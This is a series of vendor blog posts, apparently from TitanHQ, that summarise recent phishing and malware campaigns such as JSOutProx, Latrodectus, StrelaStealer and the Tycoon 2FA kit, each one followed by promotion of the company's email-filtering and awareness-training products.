An email sandbox is an isolated environment where messages that meet certain criteria are sent after scans by antivirus engines have shown the messages to be free from malware. In the sandbox, messages are subjected to deep inspection to identify malware from its behavior rather than signature. Many malware variants have been developed to resist analysis or pass sandbox checks, such as delaying malicious actions for a set period. A slight disadvantage of email sandboxing is a small delay in email delivery, but it is important to ensure that messages are analyzed in detail and anti-sandboxing capabilities are defeated. There are, however, ways to get sandbox protection while minimizing the impact on the business.

Whether you are looking for a gateway spam filter or a hosted spam filter to improve protection against email threats or advanced phishing protection, TitanHQ can help. Give the team a call today for detailed information on TitanHQ products and advice on the most effective solutions to meet the needs of your business. You can take advantage of the free trials of TitanHQ products, which are provided with full support to help you get the most out of the trial.

Financial Institutions Targeted in Phishing Campaign That Delivers the JSOutProx RAT

A phishing campaign has been running since late March that tricks people into installing a new version of the remote access trojan, JSOutProx. JSOutProx was first identified in 2019 and is a backdoor that utilizes JavaScript and .NET that allows users to run shell commands, execute files, take screenshots, control peripheral devices, and download additional malware payloads. The malware is known to be used by a threat actor tracked as Solar Spider, which mostly targets financial institutions in Central Europe, South Asia, Southeast Asia, and Africa, with the latest version of the malware also being used to target organizations in the Middle East.

The malware has mostly been used on banks and other financial institutions. If infected, the malware collects information about its environment and the attackers then download any of around 14 different plug-ins from either GitHub or GitLab, based on the information the malware collects about its operating environment. The malware can be used to control proxy settings, access Microsoft Outlook account details, capture clipboard content, and steal one-time passwords from Symantec VIP.

Like many other remote access trojans, JSOutProx is primarily delivered via phishing emails. A variety of lures have been used in the phishing emails but the latest campaign uses fake notifications about SWIFT payments in targeted attacks on financial institutions and MoneyGram payment notifications in attacks on individuals, which aim to trick the recipients into installing the malware.

The latest campaign uses JavaScript attachments that masquerade as PDF files of financial documents contained in .zip files. If the user attempts to open the fake PDF file, the JavaScript is executed deploying the malware payload. The main aim of the campaign is to steal user account credentials, gather sensitive financial documents, and obtain payment account data, which can either be used to make fraudulent transactions or be sold to other threat actors on the dark web. Email accounts are often compromised which can be leveraged in Business Email Compromise (BEC) attacks to steal funds from clients. According to VISA, “The JSOutProx malware poses a serious threat to financial institutions around the world, and especially those in the AP region as those entities have been more frequently targeted with this malware.”

Since phishing is the main method of malware delivery, the best defense against attacks is advanced anti-spam software and end-user security awareness training. JSOutProx malware is able to bypass many traditional anti-spam solutions and anti-virus software due to the high level of obfuscation. The best defense is an anti-spam solution with AI and machine learning capabilities that can identify the signs of malicious emails by analyzing message headers and message content to determine how they deviate from the emails typically received by the business and also search for the signs of phishing and malware delivery based on the latest threat intelligence.

To identify the malicious attachments, an anti-spam solution requires sandboxing. Any messages that pass standard antivirus checks are sent to the sandbox where behavior is analyzed to identify malicious actions, rather than relying on malware signatures for detection. SpamTitan can extract and analyze files in compressed archives such as .zip and .rar files and in recent independent tests, SpamTitan achieved a phishing catch rate of 99.914%, a malware catch rate of 99.511%, with a false positive rate of 0.00%. SpamTitan from TitanHQ is delivered as either a hosted anti-spam service or an anti-spam gateway that is installed on-premises on existing hardware. SpamTitan has been developed to be easy to implement and use and meet the needs of businesses of all sizes and managed service providers.

Phishing emails target employees so it is important to teach them how to identify phishing emails. Due to the fast-changing threat landscape, security awareness training should be provided continuously to the workforce, and phishing simulations should be conducted to give employees practice at identifying threats. SafeTitan from TitanHQ can be used to easily create effective training programs that run continuously throughout the year and keep employees up to date on the latest threats and tactics, techniques, and procedures used by malicious actors. SafeTitan also delivers relevant training in real-time in response to security mistakes and phishing simulation failures. Check out these anti-spam tips for further information on improving your defenses against phishing and get in touch with TitanHQ for more information on SpamTitan email security and the SafeTitan security awareness training platform.

Monthly Salary Reports Used as Lure in RAT-delivering Phishing Campaign

One of the most effective ways of getting employees to open malicious emails is to make the emails appear to have been sent internally and to use a lure related to salaries, as is the case with a recently identified campaign that is used to deliver a Remote Access Trojan called NetSupport RAT.

The campaign was first identified by researchers at Perception Point who intercepted an email that appeared to have been sent by the accounts department and purported to be a monthly salary report. The recipient is told to review the report and get back in touch with the accounts department if they have any questions or concerns about the data.  Due to the sensitive nature of the data, the salary chart is in a password-protected document, and the employee is told to enter the password provided in the email if the enable editing option is unavailable. The user is prompted to download the .docx file, enter the password, and then click enable editing, after which they need to click on the image of a printer embedded in the document. Doing so will display the user’s salary graph.

The document uses an OLE (Object Linking and Embedding) template which is a legitimate tool that allows linking to documents and other objects, in this case, a malicious script that is executed by clicking on the printer icon. This method of infection is highly effective, as the malicious payload is not contained in the document itself, so standard antivirus scans of the document will not reveal any malicious content. If the user clicks the printer icon, a ZIP archive file will be opened that includes a single Windows shortcut file, which is a PowerShell dropper that will deliver the NetSupport RAT from the specified URL and execute it, also adding a registry key for persistence.

NetSupport RAT has been developed from a legitimate remote desktop tool called NetSupport Manager which is typically used to provide remote technical support and IT assistance. The malware allows a threat actor to gain persistent remote access to an infected device, gather data from the endpoint, and run commands. While the use of OLE template manipulation is not new, this method has not previously been used to deliver the NetSupport RAT via email.

The threat actor uses encrypted documents to deliver the malware to evade email security solutions, and the emails are sent using a legitimate email marketing platform called Brevo, which allows the emails to pass standard reputation checks. This campaign is another example of how threat actors are increasing the sophistication of their phishing campaigns and how they can bypass standard email security defenses, including Microsoft’s anti-malware and anti-phishing protections for Microsoft 365 environments.

While the lure and the steps users are taken through are reasonable, there are red flags at various stages of the infection process where end users should identify the email as potentially malicious. In order for that to happen, end users should be provided with regular security awareness training. TitanHQ offers a comprehensive security awareness training platform called SafeTitan, which includes training modules to teach employees how to identify the red flags in email campaigns such as this. The platform also includes a phishing simulator, that allows these types of emails to be sent to employees to test the effectiveness of their training. If they fail a simulation, they are immediately shown where they missed the opportunity to identify the threat, with relevant training generated instantly in real time.

Sophisticated phishing attacks require sophisticated anti-phishing defenses to block these emails before they reach end users’ inboxes. While standard antivirus checks can block many malicious payloads, behavioral analysis of attachments and files is essential. TitanHQ’s cloud-based anti-spam service – SpamTitan – performs a barrage of front-end checks of messages including reputation checks and Bayesian analysis, machine-learning algorithms analyze messages for potentially malicious and phishing content, scan attachments with twin antivirus engines, and messages are sent to a sandbox for deep analysis. In the sandbox, malicious behavior can be identified allowing even sophisticated phishing emails to be blocked by the cloud spam filter.

A hosted email filter is often the best fit for businesses, although SpamTitan is available as a gateway spam filter. The TitanHQ team will be happy to listen to your requirements and suggest the best option to meet your needs. Give the team a call today to find out more about improving your email defenses against sophisticated phishing and malware distribution campaigns and how to provide more effective security awareness training.

Sophisticated Phishing Campaign Delivers Rats via SVG File Attachments

A sophisticated phishing campaign has been detected that is being used to deliver a variety of Remote Access Trojan (RAT) malware, including Venom RAT, Remcos RAT, and NanoCore RAT, as well as a stealer that targets cryptocurrency wallets. The campaign uses email as the initial access vector with the messages purporting to be an invoice for a shipment that has recently been delivered. The emails include a Scalable Vector Graphics (SVG) file attachment – an increasingly common XML-based vector image format.

If the file is executed, it will drop a compressed (zip) file on the user’s device. The zip file contains a batch file that has been created with an obfuscation tool (most likely BatCloak) to allow it to evade anti-virus software. If not detected as malicious, a ScrubCrypt batch file is unpacked – another tool used to bypass antivirus protections – which delivers two executable files that are used to deliver and execute the RAT and establish persistence. This method of delivery allows the malware to evade AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows) antivirus protections.

One of the primary payloads is Venom RAT, which establishes a connection with its command and control (C2) server, transmits sensitive information gathered from the compromised device and runs commands from its C2 server. Venon RAT can download additional modules and malware payloads, including a stealer malware that targets folders associated with cryptocurrency wallets and applications including Atomic Wallet, Electrum, Exodus, Foxmail, and Telegram.

The sophisticated nature of this campaign and the obfuscation used to hide the malicious payloads from traditional antivirus software demonstrates the need for advanced email defenses and end-user training. Email security solutions that rely on malware signatures are easily bypassed, which is why it is important to use an anti-spam solution that incorporates sandboxing for blocking malware and AI and machine learning capabilities to identify malicious emails.

SpamTitan uses AI and machine learning algorithms to detect phishing emails that other solutions miss – including Microsoft’s basic and advanced anti-phishing mechanisms for Microsoft 365. SpamTitan includes Sender Policy Framework (SPF), SURBL’s, RBL’s, Bayesian analysis, and more, and the machine learning algorithms can detect email messages that deviate from the typical messages received by a business and can identify header anomalies, address spoofing, and suspect email body content. All inbound messages are subjected to standard and advanced malware checks, including scans using twin anti-virus engines and email sandboxing.  If all anti-malware checks are passed, including unpacking and analyzing compressed files, messages are sent to the sandbox for behavioral analysis.

In the cloud-based sandbox, malicious actions are identified such as attempts to deliver additional files as is commonly seen in multi-stage attacks and C2 calls. In recent independent tests (Virus Bulletin), SpamTitan achieved a phishing catch rate of 99.914%, a malware catch rate of 99.511%, and a false positive rate of 0.00%. With phishing attacks becoming more sophisticated you need to have sophisticated defenses. With email security protection provided by SpamTitan and security awareness training delivered using TitanHQ’s award-winning SafeTitan security awareness training and phishing simulation platform you will be well protected from email-based attacks.

Give the TitanHQ team a call today to find out more about how you can improve your defenses against email-based attacks with sandboxing technology and how to add more layers to your defenses to block the full range of cyberattacks.

Stealthy Lactrodectus Malware Increasingly Used for Initial Access to Networks

A relatively new malware variant dubbed Latrodectus is increasingly being used to gain initial access to business networks. Latrodectus is the Latin for Widow spiders, but the malware was so named because of a line in the code that mentions the word. The malware was first detected in November 2023, and detections have been increasing ever since, especially since February 2024. Analyses of Latrodectus malware have revealed strong similarities with the IcedID remote access trojan (RAT) and malware loader, and the infrastructure that supports the malware was previously used in IcedID campaigns. That strongly suggests that Latrodectus malware is the successor of IcedID and was most likely developed by the same threat actor.

Latrodectus malware is primarily a malware downloader and backdoor that is used to deliver a range of different payloads and execute commands on an infected device. Latrodectus is a modular malware capable of adapting to different environments, has extensive capabilities, is stealthy, and can bypass many cybersecurity solutions.  The malware checks for the presence of debuggers, has anti-sandbox capabilities and encrypts communications with its C2 server. The malware gains persistence via auto-run keys and scheduled tasks.

Latrodectus malware is believed to be used by highly capable threat actors that specialize in gaining initial access to networks to sell on to other threat actors such as ransomware groups. The malware is primarily distributed in phishing emails, with the detected emails so far using Microsoft Azure and Cloudflare-themed lures, with either PDF file attachments or URLs embedded in emails. The malware has also been identified as being distributed via contact form spam.

If the PDF files are opened, the user is told that the document has been uploaded to the Microsoft Azure Cloud and they are required to download it. The user is then directed to a fake Cloudflare security check that adds legitimacy but also prevents email security solutions from following the link and prevents in-depth analysis in sandboxes. If the user proceeds, they will download a JavaScript file that appears to be the document indicated in the PDF file. If the file is executed, a script runs that downloads an MSI installer, which drops and executes the Lactrodectus DLL.

Due to the evasive capabilities of the malware, standard email security solutions are unlikely to identify the phishing emails as malicious, and even email sandboxing checks may be passed. An advanced anti-spam service is required that incorporates AI- and machine learning capabilities to identify the malicious nature of the email. SpamTitan Plus is an advanced email security solution with the highest coverage of anti-phishing feeds of any product on the market, incorporating coverage of 100% of all current market-leading anti-phishing feeds. The superior threat intelligence fed into the system and massive clickstream traffic from more than 600 million users and endpoints ensure the URLs used to deliver malware are detected and blocked. The machine learning capabilities of SpamTitan Plus allow the solution to predict and block novel phishing campaigns, including phishing attacks that use personalized URLs when targeting individuals. URLs are followed and are rewritten to identify the destination, and the solution features time-of-click protection to identify and block URLs that are weaponized after delivery.

As an additional protection, businesses should consider a web filtering solution. WebTitan from TitanHQ protects against the web-based component of cyberattacks. While SpamTitan Plus can block attempts to visit URLs embedded in emails and email attachments, WebTitan will block visits to URLs from general web browsing, redirects from malvertising, and non-email communications. WebTitan can also be configured to block downloads of files from the Internet associated with malware – JavaScript files for instance.

End-user training is also important to teach cybersecurity best practices and eliminate risky behaviors. SafeTitan is a comprehensive security awareness training platform with hundreds of training modules that can be easily configured to create and automate training courses relevant to individuals and user groups. The platform includes a phishing simulator for conducting realistic phishing simulations, using messages that have been created from genuine phishing attacks. The platform is the only behavior-driven security awareness training platform that delivers training in real time in response to simulation failures and security mistakes.

As cyber threats increase in sophistication, multiple cybersecurity solutions are required to provide multi-layered protection. TitanHQ solutions will ensure you are well protected from ever-changing cyber threats and sophisticated phishing and malware attacks.

TitanHQ Achieves Virus Bulletin VBSpam+ Certification with 99.91% Phishing Catch Rate in Latest Tests

TitanHQ has claimed a Top 3 position in a recent Virus Bulletin email security test, achieving an exceptional 99.98% spam catch rate and 99.91% phishing catch rate for the cutting-edge filtering engine that powers the SpamTitan (email security) and PhishTitan (phishing protection) solutions, earning TitanHQ the prestigious VBSpam+ certification for the products.

Virus Bulletin is a security information portal and independent testing and certification body that has earned a formidable reputation within the cybersecurity community for providing security professionals with intelligence about the latest developments in the global threat landscape. Virus Bulletin conducts regular tests of security solutions to determine how well they perform at detecting and blocking threats, and for more than 20 years has been benchmarking cybersecurity solutions. Virus Bulletin’s public certifications cover all types of security threat protection, including anti-spam and anti-phishing solutions for enterprises.

In the Q1, 2024 tests, Virus Bulletin assessed nine comprehensive email security solutions, including TitanHQ’s email security suite which comprises SpamTitan and PhishTitan. The email security solutions were put to the test to assess how effective they are at blocking unsolicited and unwanted spam emails and malicious messages of all types. TitanHQ’s solutions achieved exceptional scores at blocking spam and phishing emails, with a spam catch rate of 99.983%, a malware catch rate of 99.511%, and a phishing catch rate of 99.914% with zero false positives. The final score for the Q1, 2024 tests was 99.983, cementing TitanHQ’s position as a leading provider of anti-phishing and anti-spam solutions for managed service providers and businesses.

“This test reaffirms TitanHQ’s unrivaled prowess in spam and phishing protection—we stand as the first choice for combating phishing attempts and spam infiltrations,” said Ronan Kavanagh, CEO at TitanHQ. “Our customers need not settle for anything less. With TitanHQ solutions, they receive unparalleled defense against phishing and spam and experience minimal false positives.

While there are many ways that cybercriminals and nation state actors breach company networks and gain access to sensitive data, phishing is the leading initial access vector. Despite phishing being such a prevalent threat, many businesses lack security solutions that can consistently identify and block these malicious messages, which results in costly compromises, data breaches, and devastating ransomware attacks. According to one study by researchers at CoreView on 1.6 million Microsoft 365 users, 90% lacked essential security protections that can combat threats such as phishing.

While Microsoft has security solutions that can block spam and phishing emails, they are unable to block advanced phishing threats. PhishTitan has been developed to work seamlessly with M365 and catch the phishing threats that M365 misses. Even Microsoft’s most advanced anti-phishing protection, the costly E5 premium security offering, fails to block many advanced threats. Testing has shown that for every 80,000 emails received, PhishTitan identifies and blocks 20 unique, sophisticated phishing attempts that Microsoft’s top solution misses, and many businesses cannot afford Microsoft’s top level of protection and are reliant on its basic anti-spam and anti-phishing protection.

If you want to improve your defenses against phishing and malware and block more spam emails, give the TitanHQ team a call and ask about SpamTitan and PhishTitan. Both email filtering solutions are available on a free trial, so you can put them to the test and see for yourself the difference they make.

Large-scale StrelaStealer Malware Campaign Spreads to US and Europe

A phishing campaign distributing StrelaStealer malware has expanded to Europe and the United States, with the attackers favoring the high-tech, finance, professional and legal services, manufacturing, government, energy, utilities, insurance, and construction sectors.

StrelaStealer malware was first identified in November 2022 and its primary purpose is to extract email account login credentials from popular email clients such as Microsoft Outlook and Mozilla Thunderbird, and exfiltrate them to its command-and-control server. StrelaStealer has previously been used to target companies in Spanish-speaking countries however, targeting has now been expanded to the United States and Europe, with attacks peaking in November 2023 and January 2023 with more than 500 attacks a day on companies in the United States and more than 100 attacks per day in Europe, according to tracking data from Palo Alto Networks Unit 42 team.

The campaign uses email as the initial access vector with the emails typically claiming to be an invoice. Early attacks used ISO file attachments that included a .lnk shortcut and an HTML file, which invoked the rundll32.exe process to execute the malware payload. The latest attacks use a different method, with .zip file attachments favored. These compressed files include Jscript files which, if executed, drop a batch file and base64-encoded file that decodes into a DLL file, which is executed using rundll32.exe to deploy the StrelaStealer payload.

Email sandboxing provides a vital layer of protection against malware, which can be difficult to detect using transitional signature-based email security solutions. Anti-virus solutions are generally signature-based, which means they can only detect known malware. Advanced email security solutions use sandboxing to analyze the behavior of files to identify and block novel malware threats. Suspicious files are sent to the sandbox for in-depth behavioral analysis. The control flow obfuscation technique used in this attack can make analysis difficult, even in sandboxed environments, with excessively long code blocks used that can result in timeouts when executed in some sandboxed environments. While sandboxing can delay email delivery, which is far from ideal for businesses that need to act on emails quickly, it is important to provide enough time to allow attachments to be fully analyzed, as StrelaStealer malware clearly demonstrates. The easiest way for businesses to sandbox email attachments is with SpamTitan Email Security.

StrelaStealer malware is actively evolving, and new methods are being developed to deliver the malware and evade security solutions. Combatting sophisticated phishing attacks such as this, requires a defense-in-depth approach to security, using multiple security solutions that provide overlapping layers of protection such as SpamTitan Email Security, PhishTitan phishing protection, and SafeTitan security awareness training. Give the TitanHQ team a call today for more information on affordable cybersecurity solutions that are easy to use and capable of blocking advanced phishing threats.

Tycoon 2FA Phishing Kit Targets M365 and Gmail Credentials and Bypasses MFA

Phishing is one of the most common methods used to gain access to credentials; however, businesses are increasingly implementing multi-factor authentication (MFA) which adds an extra layer of protection and means stolen credentials cannot be used on their own to gain access to accounts. An additional authentication factor is required before access to the account is granted. While any form of MFA is better than none, MFA does not protect against all phishing attacks. There are several popular phishing-as-a-service (PhaaS) platforms that can steal credentials and bypass MFA including LabHost, Greatness, and Robin Banks. For a relatively small fee, any cybercriminal looking to compromise accounts can use the PhaaS platform and gain access to MFA-protected accounts.

A relatively new PhaaS platform has been growing in popularity since its discovery in October 2023 which has been causing concern in the cybersecurity community. Dubbed Tycoon 2FA, the PhaaS platform is being offered through private Telegram groups. Like many other PhaaS platforms, Tycoon 2FA uses adversary-in-the-middle (AiTM) tactics to steal MFA tokens, allowing access to be gained to accounts. The phishing kit uses at least 1,100 domains and has been used in thousands of phishing attacks.

Like most phishing attacks, initial contact is made with end users via email. The messages include a malicious link or a QR code. QR codes are popular with phishers as they communicate a URL to the end user and are difficult for email security solutions to identify as malicious. To ensure that the malicious URLs are not detected by security solutions, after clicking the link or visiting the website via the QR code, the user must pass a security challenge (Cloudflare Turnstile). The web page to which the user is directed targets Microsoft 365 or Gmail credentials. The user’s email address is captured and used to prefill the login page, and when the user enters their password it is captured and they are directed to a fake MFA page.

The phishing kit uses a reverse proxy server that relays the user’s credentials to the legitimate service being targeted in real-time and similarly captures the session cookie when the MFA challenge is passed. The user is unlikely to recognize that their account has been compromised as they are redirected to a legitimate-looking page when the MFA mechanism is passed. According to the researchers, many different threat actors have been using the kit for their phishing campaigns, with the Tycoon 2FA operators having received almost $395,000 in payments to their Bitcoin wallet as of March 2024. The price of the phishing kit is $120 for 10 days of usage which shows how popular the platform is with cybercriminals.

PhaaS platforms allow cybercriminals to conduct sophisticated attacks and bypass MFA without having to invest time and money setting up their own infrastructure they significantly lower the entry barrier for conducting MFA-bypassing phishing attacks. An advanced spam filtering service such as SpamTitan Plus will help to prevent malicious emails from reaching inboxes, and is an ideal spam filter for MSPs looking to provide the best level of protection for their clients. The SpamTitan suite of email security solutions combines phishing, spam, and antivirus filtering and independent tests show a spam block rate of 99.983% and a malware block rate of 99.51%.

PhishTitan from TitanHQ greatly improves protection against more advanced phishing campaigns such as those that use QR codes. Employees should be provided with regular security awareness training to help them identify and avoid phishing messages, and businesses should consider using phishing-resistant MFA rather than more basic forms of 2-factor authentication that use SMS or one-time passwords, which phishing kits such as Tycoon 2FA can easily bypass.

U.S. Government Entities Impersonated in Business Email Compromise Attacks

Business Email Compromise (BEC) attacks may not be as frequently encountered as phishing attacks but the losses to this type of attack are far greater. According to figures from the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3), $2.9 billion was lost last year to BEC attacks – The second most expensive type of cybercrime.

BEC attacks usually involve impersonation, with the attacker posing as a trusted individual. Contact is established and the scammer tricks the victim into divulging sensitive company information or transferring a large sum of money. For instance, the scammer may pose as a contractor and request that bank details are changed for an upcoming payment. The scam is not usually detected until after the transfer has been made and the funds have been withdrawn from the attacker-controlled account.

BEC attacks can be difficult for email security solutions to identify, as the emails are often sent from a known and trusted email account that has been compromised in a phishing attack. BEC scammers research their targets and may have access to past conversations between the victim and the person they are impersonating and can therefore disclose information from past conversations in email exchanges to convince the target that they are who they claim they are. The scams may also be spread across multiple emails, with trust building during the exchanges.

One of the latest BEC campaigns to be identified involves the impersonation of U.S. government entities, such as the U.S. Department of Transportation, Department of Agriculture, and Small Business Association. Initial contact is made via email and a PDF attachment is sent that includes a QR code, which has links about fake bidding processes. The targeted individual is told to use the QR code to find out more information about the bidding process.

The PDF file explains that the QR code is included as complaints have been received that the bid button in the email does not work with some browsers and that the QR code will direct them to a document that should be downloaded as it is required to submit a bid. The emails and the PDF are crafted to appear to have been sent by the spoofed organization, and the website to which the user is directed resembles the official portal used by the spoofed government agency.

If the QR code is scanned, the user will be directed to a phishing site where they will be required to enter their Office 365 credentials, which will provide the attacker with access to their email account. Once access has been gained, the scammers can proceed to the next phase of the attack. They search the email account for messages related to banking or finance and use that information for their BEC attack and send messages to contacts that include fraudulent invoices or payment requests. The emails are sent from a trusted account, so the emails will likely be delivered and there is a good chance that the attack will be successful.

Security awareness training can help to raise awareness of the threat of these attacks with individuals involved in financial transactions in a company, and policies should be in place that require any requested change to banking information to be verified by phone using a previously verified phone number. It is also important to have an email security solution in place to block or flag potential BEC messages.

TitanHQ’s PhishTitan is an ideal choice. PhishTitan can identify and flag sophisticated phishing and BEC emails and can also read and follow the URLs encoded in QR codes. When a suspicious email is detected a banner is added to warn the user, and the emails can be auto-remediated and sent to the junk folder. PhishTitan improves Microsoft’s Office 365 spam filter. Independent tests by Virus Bulletin show the engine that powers T

itanHQ’s SpamTitan spam filter for Office 365 and the PhishTitan 0365 anti-phishing solution has a phishing catch rate of 99.914% with zero false positives. For every 80,000 emails received, PhishTitan identifies and blocks 20 unique, sophisticated phishing attempts that Microsoft’s top anti-phishing solution misses. The solution is also just a fraction of the cost of the average loss to a single BEC attack.

For more information about PhishTitan and how it can protect your business from advanced phishing and BEC attacks, give the TitanHQ team a call.

Facebook Messages Used to Distribute Snake Infostealer Malware

Malware is often distributed via email or websites linked in emails, and advanced email security solutions such as SpamTitan Plus can protect you by preventing the messages from reaching inboxes. SpamTitan Plus uses dual antivirus engines to detect known malware and sandboxing to identify and block zero-day malware threats. SpamTitan Plus also rewrites URLs, uses predictive analysis to identify suspicious URLs, and blocks those URLs to prevent users from reaching the websites where malware is hosted. To get around email security solutions, cybercriminals use other methods for making initial contact with end users, and instant messaging services are a popular alternative.

Researchers at Cybereason recently identified a malware distribution campaign that distributes a Python-based information stealer via Facebook messages. The infostealer has been dubbed Snake and has been developed to steal credentials and other sensitive information. The campaign was first detected in the summer of 2023 and targets businesses. The messages use lures such as complaints and offers of products from suppliers to trick users into visiting a link and downloading a file. As is common with malware distribution campaigns, the threat actor uses legitimate public repositories for hosting the malicious file, such as GitHub and GitLab. The file to which the user is directed is a compressed file and, if extracted, will lead to the execution of a first-stage downloader. The first-stage downloader fetches a second compressed file,  extracts the contents, and executes a second downloader, which delivers the Python infostealer.

Three different variants of the infostealer have been identified, all of which gain persistence via the StartUp folder. Each variant targets web browsers, including Brave, Chromium, Chrome, Edge, Firefox, Opera, and the Vietnamese CoC CoC browser, with the latter and other evidence suggesting that the campaign is being conducted by a Vietnamese threat actor. All three variants also target Facebook cookies. The gathered data and cookies are exfiltrated in a .zip file via the Telegram Bot API or Discord.

One way of blocking these attacks is to use a web filter to block access to instant messaging services that are not required for business purposes, including Facebook Messenger. With WebTitan it is possible to block Messenger without blocking the Facebook site, and controls can be implemented for different users to allow users with responsibility for updating the organization’s social media sites to access the platforms while preventing access for other users. It is also a good practice to use WebTitan to block downloads of executable files from the Internet to prevent malware delivery and stop employees from downloading and installing unauthorized software.

Dropbox Abused in Novel Phishing Attack to Obtain M365 Credentials

The file hosting service Dropbox is being abused in a novel phishing campaign that exploits trust in the platform to harvest Microsoft 365 credentials. The campaign targeted 16 employees of an organization who received an email from the no-reply[@]dropbox.com account, a legitimate email account that is used by Dropbox. The emails included a link that directed the recipients to a Dropbox-hosted PDF file, which was named to appear as if it had been created by one of the organization’s partners. If the PDF file was opened, the user would see a link that directs them to an unrelated domain – mmv-security[.]top. One of the employees was then sent a follow-up email reminding them to open the PDF file that was sent in the first email. They did, and they were directed to a phishing page that spoofed the Microsoft 365 login page. A couple of days later, suspicious logins were detected in the user’s Microsoft 365 account from unknown IP addresses, which were investigated and found to be associated with ExpressVPN, indicating the attacker was using the VPN to access the account and mask their IP address.

Multifactor authentication was correctly configured on the account but this appears to have been bypassed, with the logins appearing to use a valid MFA token. After capturing credentials, the employee is thought to have unknowingly approved the MFA authentication request which allowed the account to be compromised. The attacker gained access to the user’s email account and set up a new rule that moved emails from the organization’s accounts team to the Conversation History folder to hide the malicious use of the mailbox. Emails were also sent from the account to the accounts team in an apparent attempt to compromise their accounts.

Phishing attacks are becoming increasingly sophisticated and much more difficult for end users to identify. Security awareness training programs often teach users about the red flags in emails they should look out for, such as unsolicited emails from unknown senders, links to unusual domains, and to be wary of any requests that have urgency and carry a threat should no action be taken. Impersonation is common in phishing attacks, but in this case, the impersonation went further with the emails sent from a valid and trusted account. That means that the email is more likely to be trusted and unlikely to be blocked by email security solutions, especially as the emails include a link to a file hosted on a trusted platform. This was also a staged attack, with follow-up emails sent, which in this case proved effective even though the second email was delivered to the junk email folder. The login page to which the user was directed looked exactly the same as the genuine login prompt for Microsoft 365, aside from the domain on which it was hosted.

Many businesses have configured multifactor authentication on their Microsoft 365 accounts, but as this attack demonstrates, MFA can be bypassed. The sophisticated nature of phishing attacks such as this demonstrates how important it is for businesses to have advanced defenses against phishing. TitanHQ’s anti-phishing solutions use AI and a large language model (LLM) with proprietary threat intelligence currently not found in any other anti-phishing and anti-spam software solutions on the market. All emails are scanned – internal and external – for phrases and keywords that are unusual and could indicate malicious intent. All URLs are checked against various threat intelligence feeds to identify malicious URLs, and URLs are rewritten to show their true destination. The solution also learns from feedback provided by users and detection improves further over time. The curated and unique email threat intelligence data is unmatched in visibility, coverage, and accuracy, and TitanHQ’s anti-spam and email security solutions feature sandboxing, where attachments are subjected to deep analysis in addition to signature-based anti-virus scanning. When a malicious email is detected, all other instances are removed from the entire M365 tenant.

If you want to improve your defenses against sophisticated phishing attacks give the TitanHQ team a call. If you are a Managed Service Provider looking for an easy-to-use solution to protect your clients from phishing and malware, look no further than TitanHQ. All solutions have been developed from the ground up to meet the needs of MSPs to better protect their customers from spam, phishing, malware, and BEC attacks.

CryptoChameleon Phishing Kit Targets FCC Employees and Cryptocurrency Platform Users

A new phishing kit has been identified that is being used to target employees of the U.S. Federal Communications Commission (FCC) and the cryptocurrency platforms Binance and Coinbase, as well as users of cryptocurrency platforms such as Binance, Coinbase, Caleb & Brown, Gemini, Kraken, ShakePay, and Trezor.

A phishing kit is a set of tools and templates that allows threat actors to conduct effective phishing campaigns. These kits are marketed on the dark web to hackers and allow them to conduct phishing campaigns without having to invest time and money into setting up their own infrastructure. Phishing kits range from simple kits that provide phishing templates and cloned login pages, to more advanced kits that are capable of adversary-in-the-middle attacks that can defeat multifactor authentication. These kits significantly lower the entry barrier for conducting phishing campaigns as they require little technical expertise. Pay a relatively small fee and sophisticated phishing campaigns can be conducted in a matter of minutes.

The new phishing kit is called CryptoChameleon and allows users to create carbon copies of the single sign-on (SSO) pages that are used by the targeted businesses. Employees are used to authenticating through a single solution, through which they authenticate with many business applications. The kit also includes templates for phishing pages to harvest the credentials of cryptocurrency platform users and employees, including pages that impersonate Okta, iCloud, Gmail, Outlook, Yahoo, AOL, and Twitter.

The phishing operation was discovered by researchers at Lookout and more than 100 high-value victims of this campaign have been identified to date. Threat actors using the kit have been contacting users via SMS, email, and phone calls to trick them into visiting a malicious site where their credentials are harvested. Users are redirected to a phishing site but before the content is displayed, they are required to pass an hCAPTCHA check. This helps with the credibility of the campaign, but most importantly it prevents automated analysis tools and security solutions from identifying the phishing site.

In the campaign targeting FCC employees, after passing the hCAPTCHA check, the user is presented with a login page that is a carbon copy of the FCC Okta page. The domain on which the page is hosted – fcc-okta[.com] – differs only slightly (1 character) from the legitimate FCC Okta login page. Login credentials alone are not normally enough to gain access to accounts as many are now protected by MFA. The captured login credentials are used to log in to the real account in real time, and the victim is then directed to the appropriate page where additional information is collected to pass the MFA checks. This could be a page that requests their SMS-based token or the MFA token from their authenticator app. Once the MFA check has been passed and the account has been accessed by the threat actor, the victim can be redirected anywhere. For instance, they could be shown a message that the login has been unsuccessful and they must try again later.

To target cryptocurrency platform users, messages are sent about security alerts such as warnings that their account has been accessed. These messages are likely to attract a rapid response due to the risk of substantial financial losses. In the campaign targeting Coinbase, the user is told they can secure their account and if they log in they can terminate suspicious devices. A similar process is used to obtain the credentials and MFA codes needed to access the account as the FCC campaign.

This is just one of many phishing kits offered on the dark web. Protecting against these phishing kits requires a combination of measures including an advanced spam filter, web filter, and security awareness training. For further information on cybersecurity solutions capable of combatting advanced phishing attempts, give the TitanHQ team a call.

Phishing-as-a-Service Poses a Serious Threat to Businesses

Cybercriminals are increasingly offering services that make it easy for anyone to conduct an attack. Skilled malware developers can concentrate on writing their malware and making it available for others to use for a fee, ransomware-as-a-service allows hackers who are skilled at breaching networks to conduct lucrative ransomware attacks without having to develop encryptors and pay for the infrastructure to their support attacks, and phishing-as-a-service provides a platform for conducting attacks to steal credentials and access accounts. These services benefit all parties and allow even more attacks to be conducted.

Phishing campaigns may appear simple, but they require a lot of time and skill to set up. Stephanie Carruthers, who leads an IBM X-Force phishing research project, said it takes her team about 16 hours to craft a phishing email, not including the time it takes to set up all the necessary infrastructure to send the email and steal credentials. Setting up the infrastructure is time-consuming and costly, and many businesses now have multi-factor authentication (MFA) to thwart attacks.

With phishing-as-a-service (PhaaS), anyone who wants to run a phishing campaign can simply pay a subscription and will be provided with all the tools they need to conduct attacks. They do not need to craft the phishing emails, they just need to set a few parameters and provide the email addresses for the campaign. PhaaS makes conducting sophisticated attacks simple and significantly lowers the bar for conducting campaigns.

